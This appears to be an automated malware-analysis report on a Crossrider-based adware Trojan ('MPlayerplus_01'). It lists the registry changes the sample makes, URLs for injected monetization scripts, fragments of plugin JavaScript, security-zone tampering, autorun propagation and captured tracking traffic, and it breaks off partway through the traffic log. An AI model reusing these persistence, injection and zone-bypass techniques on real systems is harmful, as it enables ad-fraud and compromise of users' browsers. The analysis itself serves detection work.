    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { //alert(appAPI.isMatchPages(*youtube*)); //alert(appAPI.isMatchPages(*watch*)); //alert(appAPI.isMatchPages(*hd=1*)) if (appAPI.isMatchPages(*youtube*) && appAPI.isMatchPages(*watch*) && !appAPI.isMatchPages(*hd=1*)) { //alert(window.location); window.location = window.location &hd=1"

    [HKCU\Software\MPlayerplus_01\Plugins\155]
    "Name" = "ibario_pops_m"

    [HKCU\Software\MPlayerplus_01\Plugins\47]
    "Name" = "resources_background"

    [HKCU\Software\MPlayerplus_01\Plugins\47]
    "Version" = "3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKCU\Software\MPlayerplus_01\Installer]
    "FullVersion" = "1.34.5.12"

    [HKCU\Software\MPlayerplus_01\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

    [HKCU\Software\MPlayerplus_01\Plugins\102]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/dealply_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\1]
    "Name" = "base"

    [HKCU\Software\MPlayerplus_01\Plugins\183]
    "Name" = "tabsWrapper"

    [HKCU\Software\MPlayerplus_01\Plugins\195]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_convertmedia_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\93]
    "Version" = "9"

    [HKCU\Software\MPlayerplus_01\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,toke'"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKCU\Software\MPlayerplus_01\Plugins\91]
    "Version" = "46"

    [HKCU\Software\MPlayerplus_01\Plugins\14]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderUtils.js"

    [HKCU\Software\MPlayerplus_01\Plugins\2]
    "Name" = "ie8_fix_1"

    [HKCU\Software\MPlayerplus_01\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\MPlayerplus_01\Plugins\36]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBackground.js"

    [HKCU\Software\MPlayerplus_01\Plugins\183]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\41]
    "Version" = "7"

    [HKCU\Software\MPlayerplus_01\Plugins\14]
    "Version" = "11"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "homepageurl" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\182]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/openUrl.js"

    [HKCU\Software\MPlayerplus_01\Plugins\9]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/searchengines_hook.js"

    [HKCU\Software\MPlayerplus_01\Plugins\91]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/monetizationLoader.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\MPlayerplus_01\Plugins\39]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEDatabase.js"

    [HKCU\Software\MPlayerplus_01\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "PluginsManifestVersion" = "27"

    [HKCU\Software\MPlayerplus_01\Installer]
    "srcid" = "001359"

    [HKCU\Software\MPlayerplus_01\Plugins\1]
    "JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});'"

    [HKCU\Software\MPlayerplus_01\Plugins\221]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "ModeType" = "production"

    [HKCU\Software\MPlayerplus_01\Plugins\43]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\MPlayerplus_01\Plugins\45]
    "Name" = "IEOnRequest"

    [HKCU\Software\MPlayerplus_01\Plugins\226]
    "URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\184]
    "Version" = "9"

    [HKCU\Software\MPlayerplus_01\Plugins\64]
    "Name" = "appApiMessage"

    [HKCU\Software\MPlayerplus_01\Plugins\36]
    "Name" = "IEBackground"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "87 41 CE 2B BB 4C A3 24 E4 2A CD 47 B6 97 AF AC"

    [HKCU\Software\MPlayerplus_01\Plugins\190]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[190] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(190, [pops])){ return; } var subId = appAPI.internal.monetization.getSubId(); subId = subId.substr(0,7) 00000000000; var _GPL_loader = { vars: {}, ivars: {}, proto: appAPI.dom.isHttps() ? https:// : http://, baseCDN: cdncache1-a.akamaihd.net, init: function() { var a = ; $jquery.each(this.vars, function(b, c) { a = b = c &"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

    [HKCU\Software\MPlayerplus_01\Plugins\22]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\28]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\39]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\64]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/appApiMessage.js"

    [HKCU\Software\MPlayerplus_01\Plugins\9]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKCU\Software\MPlayerplus_01\Plugins\94]
    "Name" = "IEPopup"

    [HKCU\Software\MPlayerplus_01\Plugins\14]
    "Name" = "CrossriderUtils"

    [HKCU\Software\MPlayerplus_01\Plugins\39]
    "Name" = "IEDatabase"

    [HKCU\Software\MPlayerplus_01\Plugins\1]
    "Version" = "10"

    [HKCU\Software\MPlayerplus_01\Plugins\220]
    "Version" = "8"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "EnableSearchIE" = "false"

    [HKCU\Software\MPlayerplus_01\Plugins\21]
    "Name" = "debug"

    [HKCU\Software\MPlayerplus_01\Plugins\44]
    "Name" = "IEMisc"

    [HKCU\Software\MPlayerplus_01\Plugins\103]
    "URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/intext_5_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\40]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEExtension.js"

    [HKCU\Software\MPlayerplus_01\Plugins\191]
    "Name" = "ciuvo_m"

    [HKCU\Software\MPlayerplus_01\Plugins\93]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\191]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ciuvo_m.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\MPlayerplus_01\Plugins\182]
    "Version" = "3"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "Version" = "9"

    [HKCU\Software\MPlayerplus_01\Plugins\184]
    "Name" = "noproblemppc_m"

    [HKCU\Software\MPlayerplus_01\Plugins\22]
    "Name" = "resources"

    [HKCU\Software\MPlayerplus_01\Plugins\1]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/base.js"

    [HKCU\Software\MPlayerplus_01\Plugins\3]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\2]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_1.js"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "Version" = "33"

    [HKCU\Software\MPlayerplus_01\Installer]
    "DefaultBrowser" = "ie"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

    [HKCU\Software\MPlayerplus_01\Plugins\38]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Installer]
    "osName" = "XP32"

    [HKCU\Software\MPlayerplus_01\Plugins\242]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\41]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInfo.js"

    [HKCU\Software\MPlayerplus_01\Plugins\221]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

    [HKCU\Software\MPlayerplus_01\Plugins\244]
    "Name" = "engageya_inner_m"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "SetNewTab" = "false"
    "Manifest" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\40]
    "Name" = "IEExtension"

    [HKCU\Software\MPlayerplus_01\Plugins\102]
    "Version" = "6"

    [HKCU\Software\MPlayerplus_01\Plugins\103]
    "Version" = "8"

    [HKCU\Software\MPlayerplus_01\Plugins\78]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\233]
    "Name" = "revizer_p_dynamic_b2b_2_m"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "PublisherName" = "Freeven"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\MPlayerplus_01\Plugins\72]
    "Name" = "appApiValidation"

    [HKCU\Software\MPlayerplus_01\Plugins\226]
    "Name" = "set_campaign_id_m"

    [HKCU\Software\MPlayerplus_01\Installer]
    "StatsDomain" = "http://stats.clientstaticserv.com"

    [HKCU\Software\MPlayerplus_01\Plugins\220]
    "Name" = "icm_base_m"

    [HKCU\Software\MPlayerplus_01\Plugins\207]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\44]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMisc.js"

    [HKCU\Software\MPlayerplus_01\Installer]
    "FullVersionForUrl" = "1_34_05_12"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\MPlayerplus_01\Plugins\28]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/initializer.js"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "UninstallerOfferUrl" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\7]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\190]
    "Name" = "pops_5_m"

    [HKCU\Software\MPlayerplus_01\Plugins\28]
    "JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "Description" = "MediaPlayerEnhance Extension"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "DisableIe" = "true"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\MPlayerplus_01\Plugins\42]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInternal.js"

    [HKCU\Software\MPlayerplus_01\Plugins\207]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/dbWrapper.js"

    [HKCU\Software\MPlayerplus_01\Plugins\177]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\22]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/resources.js"

    [HKCU\Software\MPlayerplus_01\Plugins\195]
    "Version" = "25"

    [HKCU\Software\MPlayerplus_01\Plugins\253]
    "Name" = "pixel_inject"

    [HKCU\Software\MPlayerplus_01\Plugins\36]
    "Version" = "8"

    [HKCU\Software\MPlayerplus_01\Plugins\253]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/pixel_inject.js"

    [HKCU\Software\MPlayerplus_01\Plugins\45]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\43]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMessaging.js"

    [HKCU\Software\MPlayerplus_01\Plugins\211]
    "Name" = "revizer_ws_dynamic_b2b_light_m"

    [HKCU\Software\MPlayerplus_01\Plugins\195]
    "Name" = "icm_convertmedia_m"

    [HKCU\Software\MPlayerplus_01\Plugins\190]
    "Version" = "3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\MPlayerplus_01\Plugins\45]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEOnRequest.js"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,155,184,191,220,195,211,221,226,233,242,244,253,91"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\MPlayerplus_01\Plugins\47]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/resources_background.js"

    [HKCU\Software\MPlayerplus_01\Plugins\184]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/noproblemppc_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\244]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\17]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/jQuery.js"

    [HKCU\Software\MPlayerplus_01\Plugins\37]
    "Version" = "6"

    [HKCU\Software\MPlayerplus_01\Installer]
    "Params" = "{ source_id : 001359, sub_id : 0, uzid : 0"

    [HKCU\Software\MPlayerplus_01\Plugins\102]
    "Name" = "dealply_m"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "Name" = "MPlayerplus_01"

    [HKCU\Software\MPlayerplus_01\Installer]
    "Time" = "1413862412"

    [HKCU\Software\MPlayerplus_01\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\MPlayerplus_01\Plugins\221]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_downloads_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\220]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_base_m.js"

    [HKCU\Software\MPlayerplus_01\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\MPlayerplus_01\Plugins\46]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IETimers.js"

    [HKCU\Software\MPlayerplus_01\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKCU\Software\MPlayerplus_01\Plugins\28]
    "Name" = "initializer"

    [HKCU\Software\MPlayerplus_01\Plugins\183]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/tabsWrapper.js"

    [HKCU\Software\MPlayerplus_01\Plugins\226]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId) { appAPI.internal.monetization.loader.setCampaignId(1026); }};"

    [HKCU\Software\MPlayerplus_01\Plugins\3]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_2.js"

    [HKLM\SOFTWARE\MPlayerplus_01\IE\Profiles]
    "S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

    [HKCU\Software\MPlayerplus_01\Plugins\221]
    "Name" = "icm_downloads_m"

    [HKCU\Software\MPlayerplus_01\Plugins\35]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEAjax.js"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "UpdateInterval" = "360"

    [HKCU\Software\MPlayerplus_01\Plugins\46]
    "Name" = "IETimers"

    [HKCU\Software\MPlayerplus_01\Plugins\21]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/debug.js"

    [HKCU\Software\MPlayerplus_01\Plugins\94]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\2]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\191]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\4]
    "Name" = "jquery_1_7_1"

    [HKCU\Software\MPlayerplus_01\Plugins\35]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\211]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\242]
    "Name" = "price_gong_m"

    [HKCU\Software\MPlayerplus_01\Plugins\244]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/engageya_inner_m.js"

    [HKCU\Software\Crossrider]
    "Bic" = "EAEB041DFB674B59BB4BCF5DE150DAB5IE"

    [HKCU\Software\MPlayerplus_01\Plugins\13]
    "Version" = "7"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "IsButtonEnabled" = "false"

    [HKCU\Software\MPlayerplus_01\Installer]
    "CodeDownloadDomain" = "http://js.clientstaticserv.com"

    [HKCU\Software\MPlayerplus_01\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKCU\Software\MPlayerplus_01\Plugins\177]
    "Name" = "crossriderDashboard"

    [HKCU\Software\MPlayerplus_01\Plugins\233]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\64]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\38]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IECallbacks.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "PublisherId" = "21636"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/jollywallet_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\211]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_light_m.js"

    [HKLM\SOFTWARE\MPlayerplus_01\IE]
    "TotalProfiles" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all local web nodes with no dots that do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process 772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "DE D2 FD 9C 6A 45 BB 67 7E 29 3F 0B A9 76 71 17"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
    "{11111111-1111-1111-1111-110511421146}" = "1"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{981FDCE3-5912-4D50-A786-2E425268440}]
    "AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-buttonutil.exe"
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{981FDCE3-5912-4D50-A786-2E425268440}]
    "AppPath" = "%Program Files%\MPlayerplus_01"

    [HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
    "{11111111-1111-1111-1111-110511421146}" = ""

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
    "AppPath" = "%Program Files%\MPlayerplus_01"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
    "AppPath" = "%Program Files%\MPlayerplus_01"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
    "AppPath" = "%Program Files%\MPlayerplus_01"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
    "AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-helper.exe"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
    "AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-codedownloader.exe"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
    "AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-buttonutil64.exe"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
    "Timestamp"

    The process 3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe:852 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "4F A3 6C D9 D2 D5 2F 2F FD E3 12 62 D8 26 93 1B"

    Dropped PE files


    HOSTS file anomalies

    No changes have been detected.

    Rootkit activity

    No anomalies have been detected.

    Propagation

    A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

  • VersionInfo

    Company Name: Goegljtz
    Product Name: Oujmyxypscw
    Product Version:
    Legal Copyright:
    Legal Trademarks:
    Original Filename:
    Internal Name:
    File Version: 22.6.3.9
    File Description: Odyqmjhkphi
    Comments:
    Language: English (United States)

    PE Sections

    Name    Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
    .text   4096             34880         35328     4.14627   8b211302c668146bb8cce549607b031f
    .data   40960            140           512       0.818128  a5a710a52d844b19513b2cab5693dbc3
    .rdata  45056            9108          9216      4.0908    004265d16597098398ce8e06897dcd29
    .bss    57344            252880        0         0         d41d8cd98f00b204e9800998ecf8427e
    .idata  311296           4868          5120      3.64756   20f692042b54593897a705a64d67ce50
    .ndata  319488           376832        8192      0         0829f71740aab1ab98b33eae21dee122
    .rsrc   696320           98304         95232     5.40652   cd8147b56e991064a2e5c04b62e8a51c

    Dropped from:

    Downloaded by:

    Similar by SSDeep:

    Similar by Lavasoft Polymorphic Checker:

    URLs



    IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

    ET MALWARE Win32/Toolbar.CrossRider.A Checkin

    Traffic

    GET /monetization.gif?event=3&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359&app=54246&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_33&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1413862412&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de HTTP/1.1
    Host: logs.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:42 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1413862422.dop010.am4.t,1413862422.cds058.am4.c
    GIF89a.............,...........D..;..


    GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: VVV.download.windowsupdate.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Content-Type: text/plain
    Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
    Accept-Ranges: bytes
    ETag: "80179bc4b3cecf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Content-Length: 18
    Cache-Control: max-age=10211
    Date: Tue, 21 Oct 2014 03:33:49 GMT
    Connection: keep-alive
    X-CCC: NO
    X-CID: 2
    1401CFCEB3C4C42958....



    GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: VVV.download.windowsupdate.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
    Accept-Ranges: bytes
    ETag: "805a83f2b9cecf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
